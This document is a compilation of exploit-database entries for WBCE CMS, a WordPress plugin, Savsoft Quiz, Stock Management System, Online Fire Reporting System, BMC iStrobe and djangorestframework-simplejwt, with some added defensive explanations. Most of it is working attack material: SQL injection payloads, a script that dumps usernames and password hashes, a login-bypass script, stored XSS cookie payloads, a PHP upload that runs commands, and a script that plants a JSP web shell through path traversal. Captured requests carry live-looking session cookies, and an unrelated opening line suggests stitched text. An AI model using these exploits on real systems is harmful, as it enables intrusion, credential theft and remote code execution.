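To check a real file, read it with `open(path, "rb").read()` and pass the bytes to `find_post_process`; a project from a trusted workflow normally carries an empty post_process.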
-
WBCE 1.6.0 - Unauthenticated SQL injection
# Exploit Title: Unauthenticated SQL injection in WBCE 1.6.0
# Date: 15.11.2023
# Exploit Author: young pope
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip
# Version: 1.6.0
# Tested on: Kali linux
# CVE : CVE-2023-39796

There is an SQL injection vulnerability in the *miniform* module, which is a default module installed in the *WBCE* CMS. It is an unauthenticated SQLi, so anyone can reach it and take over the whole database.

In the file /modules/miniform/ajax_delete_message.php there is no authentication check. On line 40 of this file there is a DELETE query that is vulnerable: the table name is placed inside backticks, and an attacker can break out of the identifier with a backtick (`). The function addslashes() (https://www.php.net/manual/en/function.addslashes.php) escapes only the following characters, and not the backtick:

* single quote (')
* double quote (")
* backslash (\)
* NUL (the NUL byte)

The DB_RECORD_TABLE parameter is vulnerable. If an unauthenticated attacker sends this request:

```
POST /modules/miniform/ajax_delete_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 162
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record
```

the response arrives after 6 seconds, because the injected SLEEP(6) ran inside the DELETE.

Reference links:
* https://nvd.nist.gov/vuln/detail/CVE-2023-39796
* https://forum.wbce.org/viewtopic.php?pid=42046#p42046
* https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
* https://pastebin.com/PBw5AvGp
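The point of the addslashes() list above is that string-literal escaping says nothing about identifier context. The following Python is an added example, not WBCE's code: it ports addslashes() faithfully, shows the advisory's DB_RECORD_TABLE payload passing through it into a backtick-quoted DELETE, and contrasts that with identifier allowlisting plus a bound parameter. The exact shape of the DELETE in ajax_delete_message.php is not quoted in the advisory, so the statement built here is an assumed stand-in; the table name miniform_data comes from the payload.

```python
import re


def addslashes(value):
    """Python port of PHP addslashes(): prefixes ' " \\ and NUL with a backslash
    and touches nothing else, so a backtick passes through untouched."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def build_delete_vulnerable(table, column, record_id):
    """Assumed shape of the vulnerable statement: every request value is escaped
    with addslashes() and then spliced in, the table name between backticks."""
    return "DELETE FROM `%s` WHERE `%s` = '%s'" % (
        addslashes(table), addslashes(column), addslashes(str(record_id)))


IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
ALLOWED_TABLES = {"miniform_data"}  # assumption: the only table this endpoint may touch


def build_delete_safe(table, column, record_id):
    """Hardened form: the table must be on an allowlist, the column must be a bare
    identifier, and the record id is bound as a parameter. Returns (sql, params)
    for a driver that uses %s placeholders (e.g. MySQLdb / PyMySQL)."""
    if table not in ALLOWED_TABLES:
        raise ValueError("unexpected table: %r" % table)
    if not IDENTIFIER.match(column):
        raise ValueError("invalid column name: %r" % column)
    return "DELETE FROM `%s` WHERE `%s` = %%s" % (table, column), (int(record_id),)


# The advisory's DB_RECORD_TABLE payload, URL-decoded.
PAYLOAD = "miniform_data` WHERE 1=1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- "


if __name__ == "__main__":
    print(build_delete_vulnerable(PAYLOAD, "message_id", 1))
    print(build_delete_safe("miniform_data", "message_id", 1))
    try:
        build_delete_safe(PAYLOAD, "message_id", 1)
    except ValueError as exc:
        print("rejected:", exc)
```

Run it and the first line shows the backtick closing the identifier and the `--` comment discarding the original WHERE clause; no amount of string-literal escaping would have prevented that, which is why identifiers need an allowlist rather than an escaper.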
-
Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
# Date: 12 April 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.1.1
# Proof Of Concept:
1. Click "Add Video" and enter the XSS payload below into the first input of the form, i.e. the request body field named "videoFields[post_type]".
# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w
# Vulnerable Property at Request: videoFields[post_type]
# Payload: <script>alert(document.cookie)</script>
# Request:

```
POST /wp-admin/options.php HTTP/2
Host: erdemstar.local
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 395
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes
```
-
WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)
# Exploit Title: WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)
# Date: 30/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip
# Version: 1.6.1
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS

## POC:

1) Log in with admin credentials and click Add-ons.
2) Click on Language > Install Language: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
3) Upload upgrade.php containing <?php echo system('id'); ?> and click Install: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php
4) You will see the output of the id command.

Result:
uid=1000(soft) gid=1000(soft) groups=1000(soft)
uid=1000(soft) gid=1000(soft) groups=1000(soft)

Note in the response below that the id output appears before the "Invalid WBCE CMS language file" error: the uploaded PHP file is executed before the installer rejects it.

### Post Request:

```
POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1
Host: demos6.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459
Content-Length: 522
Origin: https://demos6.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="formtoken"

5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"
Content-Type: application/x-php

<?php echo system('id'); ?>
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="submit"


-----------------------------86020911415982314764024459--
```

### Response:

```
<!-- ################### Up from here: Original Code from original template ########### -->
<!-- senseless positioning-table: needed for old modules which base on class td.content -->
<div class="row" style="overflow:visible">
<div class="fg12">
<table id="former_positioning_table">
<tr>
<td class="content">
uid=1000(soft) gid=1000(soft) groups=1000(soft)
uid=1000(soft) gid=1000(soft) groups=1000(soft)
<div class="top alertbox_error fg12 error-box">
<i class=" fa fa-2x fa-warning signal"></i>
<p>Invalid WBCE CMS language file. Please check the text file.</p>
<p><a href="index.php" class="button">Back
```
-
Savsoft Quiz v6.0 Enterprise - Stored XSS
# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting
# Date: 2024-01-03
# Exploit Author: Eren Sen
# Vendor: SAVSOFT QUIZ
# Vendor Homepage: https://savsoftquiz.com
# Software Link: https://savsoftquiz.com/web/index.php/online-demo/
# Version: < 6.0
# CVE-ID: N/A
# Tested on: Kali Linux / Windows 10
# Vulnerabilities Discovered Date : 2024/01/03

# Persistent Cross Site Scripting (XSS) Vulnerability
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: quiz_name
# Proof of Concept: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13

# HTTP Request:

```
POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1
Host: demos1.softaculous.com
Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx
Content-Length: 411
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://demos1.softaculous.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=
```
-
Stock Management System v1.0 - Unauthenticated SQL Injection
# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
# Date: February 6, 2024
# Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
# Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
# Tested on: Linux and Windows, XAMPP
# CVE-2023-51951
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.

```
import requests
from bs4 import BeautifulSoup
import argparse


def print_header():
    print("\033[1m\nStock Management System v1.0\033[0m")
    print("\033[1mSQL Injection Exploit\033[0m")
    print("\033[96mby blu3ming\n\033[0m")


def parse_response(target_url):
    try:
        target_response = requests.get(target_url)
        soup = BeautifulSoup(target_response.text, 'html.parser')
        # The injected group_concat() is reflected in the "remarks" textarea of the PO page
        textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text
        # Split the text using ',' as a delimiter
        users = textarea_text.split(',')
        for user in users:
            # Split username and password using ':' as a delimiter
            username, password = user.split(':')
            print("| {:<20} | {:<40} |".format(username, password))
    except Exception:
        print("No data could be retrieved. Try again.")


def retrieve_data(base_url):
    target_path = '/sms/admin/?page=purchase_order/manage_po&id='
    # UNION SELECT with 13 columns; column 9 carries username:password pairs from the users table
    payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"
    target_url = base_url + target_path + payload
    print("+----------------------+------------------------------------------+")
    print("| {:<20} | {:<40} |".format("username", "password"))
    print("+----------------------+------------------------------------------+")
    parse_response(target_url)
    print("+----------------------+------------------------------------------+\n")


if __name__ == "__main__":
    about = 'Unauthenticated SQL Injection Exploit - Stock Management System'
    parser = argparse.ArgumentParser(description=about)
    parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
    args = parser.parse_args()
    print_header()
    retrieve_data(args.base_url)
```
-
Online Fire Reporting System OFRS - SQL Injection Authentication Bypass
# Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass
# Date: 02/10/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip
# Version: V 1.2
# Tested on: Windows 11 + XAMPP 8.0.30

## Exploit Description ##

SQL Injection Vulnerability in ofrs/admin/index.php: the SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process.

## Steps to reproduce ##

1. Open the admin panel page at the following URL: http://localhost/ofrs/admin/index.php
2. Enter the following payload in the username box: admin'or'1--
3. Press the Login button or press Enter.

## Proof Of Concept [1] ##

```
POST /ofrs/admin/index.php HTTP/1.1
Host: localhost
Content-Length: 46
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/ofrs/admin/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29
Connection: close

username=admin%27or%27--&inputpwd=&login=login
```

## Proof Of Concept [ Python Based Script ] [2] ##

```
import os
import requests
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import pyautogui

banner = """ ░█████╗░███████╗██████╗░░██████╗ ░█████╗░███╗░░░███╗░██████╗ ██╔══██╗██╔════╝██╔══██╗██╔════╝ ██╔══██╗████╗░████║██╔════╝ ██║░░██║█████╗░░██████╔╝╚█████╗░ ██║░░╚═╝██╔████╔██║╚█████╗░ ██║░░██║██╔══╝░░██╔══██╗░╚═══██╗ ██║░░██╗██║╚██╔╝██║░╚═══██╗ ╚█████╔╝██║░░░░░██║░░██║██████╔╝ ╚█████╔╝██║░╚═╝░██║██████╔╝ ░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░ ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░ # Code By : Diyar Saadi """
print(banner)

payload_requests = input("Enter the payload: ")
url_requests = "http://localhost/ofrs/admin/index.php"
# Field names match the captured login request above
data = {
    'username': payload_requests,
    'inputpwd': 'password',
    'login': 'login'
}
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded'
}

try:
    # A successful bypass answers with a redirect to the dashboard
    response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False)
    if response.status_code == 302 and 'dashboard.php' in response.headers.get('Location', ''):
        print("Requests version: Admin Panel Successfully Bypassed !")
        # Selenium version: repeat the login in a real browser and capture the dashboard
        url_selenium = "http://localhost/ofrs/admin/index.php"
        chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe"
        driver = webdriver.Chrome(service=Service(chrome_driver_path))
        driver.get(url_selenium)
        pyautogui.typewrite(payload_requests)
        pyautogui.press('tab')
        pyautogui.typewrite(payload_requests)
        pyautogui.press('enter')
        WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php"))
        screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png")
        driver.save_screenshot(screenshot_path)
        print(f"Selenium version: Screenshot saved as {screenshot_path}")
        driver.quit()
    else:
        print("Requests version: Login failed.")
except Exception as e:
    print(f"An error occurred: {e}")
```
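Why the payload works is easier to see against a real query than against a screenshot. The following Python is an added example, not code from the advisory or from the OFRS source: it runs the login query against an in-memory SQLite table (the table and column names are assumed, since the advisory does not quote the PHP) first with request values spliced into the SQL, then with bound parameters. With the username `admin'or'1--` the spliced statement becomes `username='admin' OR ('1--' AND password='')`; AND binds tighter than OR, so the row is returned as soon as a user named admin exists, regardless of the password.

```python
import sqlite3

# Username payload from the advisory (step 2); the password box is left empty.
PAYLOAD = "admin'or'1--"


def make_db():
    """Constructed stand-in for the application's admin table (assumed name and
    columns, constructed row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbladmin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO tbladmin VALUES ('admin', 'S3cret!')")
    return conn


def vulnerable_query(username, password):
    """The insecure pattern the advisory describes: request values spliced into SQL."""
    return "SELECT username FROM tbladmin WHERE username='%s' AND password='%s'" % (username, password)


def login_vulnerable(conn, username, password):
    return conn.execute(vulnerable_query(username, password)).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised form: the payload is compared as a plain string and matches nothing."""
    sql = "SELECT username FROM tbladmin WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(PAYLOAD, ""))
    print("vulnerable login with payload:", login_vulnerable(db, PAYLOAD, ""))
    print("parameterised login with payload:", login_safe(db, PAYLOAD, ""))
    print("parameterised login with real credentials:", login_safe(db, "admin", "S3cret!"))
```

The same reasoning explains the captured request's shorter variant `admin'or'--`: anything after the OR is irrelevant once `username='admin'` is true.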
-
BMC Compuware iStrobe Web - 20.13 - Pre-auth RCE
#!/usr/bin/env python3
# Exploit Title: Pre-auth RCE on Compuware iStrobe Web
# Date: 01-08-2023
# Exploit Author: trancap
# Vendor Homepage: https://www.bmc.com/
# Version: BMC Compuware iStrobe Web - 20.13
# Tested on: zOS
# CVE : CVE-2023-40304

# To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and
# impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files).
# The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell
# (content of the webshell in the "topicText" parameter).
# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed.

import argparse
import sys
import urllib.parse

import requests
import urllib3

# Every request is sent with verify=False (self-signed certificates are the norm on these hosts);
# silence the per-request warning so the command output stays readable.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def upload_web_shell(url):
    # "fileName" traverses out of the user-help directory into a directory the container executes
    # JSP from; "topicText" carries the JSP web shell that is written to that file.
    data = {
        "fileName": "../jsp/userhelp/ws.jsp",
        "author": "Guest",
        "name": "test",
        "action": "open",
        "topicText": "<%@ page import=\"java.lang.*,java.io.*,java.util.*\" %>"
                     "<%Process p=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));"
                     "BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));"
                     "BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));"
                     "String s=\"\";while((s=stdInput.readLine()) != null){out.println(s);};"
                     "s=\"\";while((s=stdError.readLine()) != null){out.println(s);};%>",
        "lang": "en",
        "type": "MODULE",
        "status": "PUB",
    }
    # If encoded, the web shell will not be uploaded properly: keep the JSP-significant characters as-is
    data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!')

    # Checking if web shell already uploaded
    r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False)
    if r.status_code != 404:
        print(f"[*] Web shell already present at {url}/istrobe/jsp/userhelp/ws.jsp, skipping upload")
        return

    # The body is pre-encoded above, so requests will not set the form content type for us
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data, headers=headers, verify=False)
    if r.status_code == 200:
        print(f"[+] Successfully uploaded web shell, it should be accessible at {url}/istrobe/jsp/userhelp/ws.jsp")
    else:
        sys.exit("[-] Something went wrong while uploading the web shell")


def delete_web_shell(url):
    # The delete action accepts the same traversing "fileName", so the shell can be removed the same way
    data = {
        "fileName": "../jsp/userhelp/ws.jsp",
        "author": "Guest",
        "name": "test",
        "action": "delete",
        "lang": "en",
        "type": "MODULE",
        "status": "PUB",
    }
    r = requests.post(f"{url}/istrobe/userHelp/deleteUserHelp", data=data, verify=False)
    if r.status_code == 200:
        print("[+] Successfully deleted web shell")
    else:
        sys.exit("[-] Something went wrong while deleting the web shell")


def run_cmd(url, cmd):
    # Sent as a form field so the command is URL-encoded and the JSP reads it via request.getParameter("cmd")
    r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data={"cmd": cmd}, verify=False)
    if r.status_code == 200:
        print(r.text)
    else:
        sys.exit(f'[-] Something went wrong while executing "{cmd}" command')


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        prog="exploit_cve_2023_40304.py",
        description="CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE",
    )
    parser.add_argument("url", help="Vulnerable URL to target. Must be like http(s)://vuln.target")
    parser.add_argument("-c", "--cmd", help='Command to execute on the remote host (Defaults to "whoami")', default="whoami")
    parser.add_argument("--rm", help="Deletes the uploaded web shell", action="store_true")
    args = parser.parse_args()

    target = args.url.rstrip("/")
    upload_web_shell(target)
    run_cmd(target, args.cmd)
    if args.rm:
        delete_web_shell(target)
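The check that the save and delete handlers above are missing, as an added example (this is illustrative code written for this page, not the vendor's code or anything from the advisory). It treats the "fileName" field the way the exploit abuses it: a value that contains path separators, or whose extension the servlet container would execute, is rejected outright rather than sanitised, and the canonical target path is confirmed to sit directly inside the upload directory. The allowed-extension set and the `save_user_help_topic` handler name are assumptions for the illustration.

```python
from pathlib import Path
from typing import Optional

# Assumed policy for this illustration: user-help topics are stored as text or HTML;
# anything the servlet container would execute (.jsp, .jspx, ...) is never an acceptable upload.
ALLOWED_SUFFIXES = {".txt", ".html"}


def validate_file_name(file_name: str, allowed=ALLOWED_SUFFIXES) -> Optional[str]:
    """Return None if `file_name` is an acceptable bare file name, else the reason it is rejected.
    Rejecting (instead of silently stripping "../") keeps the attempt visible in the logs."""
    if not file_name or file_name in (".", ".."):
        return "empty or dot-only file name"
    if "/" in file_name or "\\" in file_name:
        return "path separators are not allowed in fileName"
    if "\x00" in file_name:
        return "NUL byte in fileName"
    suffix = Path(file_name).suffix.lower()
    if suffix not in allowed:
        return f"extension {suffix or '(none)'} is not allowed"
    return None


def resolve_upload_path(base_dir: str, file_name: str, allowed=ALLOWED_SUFFIXES) -> Path:
    """Map a validated fileName onto a path inside base_dir, then prove it stayed there."""
    reason = validate_file_name(file_name, allowed)
    if reason:
        raise ValueError(reason)
    base = Path(base_dir).resolve()
    target = (base / file_name).resolve()
    # Defence in depth: even after the name checks, the canonical target must be a direct
    # child of the canonical base directory (catches odd symlinked base_dir layouts).
    if target.parent != base:
        raise ValueError("resolved path escapes the upload directory")
    return target


def save_user_help_topic(base_dir: str, file_name: str, topic_text: str) -> Path:
    """Hypothetical hardened save handler: the topic body is only ever written to a validated path."""
    target = resolve_upload_path(base_dir, file_name)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(topic_text, encoding="utf-8")
    return target


if __name__ == "__main__":
    # The advisory's payload fails twice over: traversal in the name and a server-executed extension.
    for name in ["../jsp/userhelp/ws.jsp", "ws.jsp", "intro.txt", "..\\..\\notes.txt"]:
        print(f"{name!r:30} -> {validate_file_name(name) or 'ok'}")
```

The same validation belongs in front of every handler that takes the field: the exploit's delete routine shows that deleteUserHelp accepts the identical traversing "fileName", so a fix limited to saveUserHelp would still leave arbitrary file deletion.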
-
djangorestframework-simplejwt 5.3.1 - Information Disclosure
# Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure
# Date: 26/01/2024
# Exploit Author: Dhrumil Mistry (dmdhrumilmistry)
# Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/
# Software Link: https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1
# Version: <= 5.3.1
# Tested on: MacOS
# CVE : CVE-2024-22513

# djangorestframework-simplejwt up to and including 5.3.1 is affected.
# The issue can lead to Broken Object Level Authorization (BOLA), Broken Function
# Level Authorization (BFLA), information disclosure and similar problems: a user can
# keep accessing web application resources after their account has been disabled,
# because the token code performs no check on the user's active status.
# If a programmer generates a JWT for an inactive user with the `AccessToken` class
# and its `for_user` method, a token is returned that can be used for authentication
# across the Django / Django REST framework application. `verify()` only checks the
# token's own claims (expiry, jti, token type); it never consults the user record, so
# the inactive state is not detected at that layer either.

# Start the Django shell:
# python manage.py shell
# ----------------------------------------
# Create an inactive user and generate a token for that user
from django.contrib.auth.models import User
from rest_framework_simplejwt.tokens import AccessToken

# create inactive user
inactive_user_id = User.objects.create_user('testuser', '[email protected]', 'testPassw0rd!', is_active=False).id

# django application programmer generates a token for the inactive user
AccessToken.for_user(User.objects.get(id=inactive_user_id))
# an error should be raised since the user is inactive, but a token is returned

# django application verifying the user's token
AccessToken.for_user(User.objects.get(id=inactive_user_id)).verify()
# no exception is raised during verification of the inactive user's token
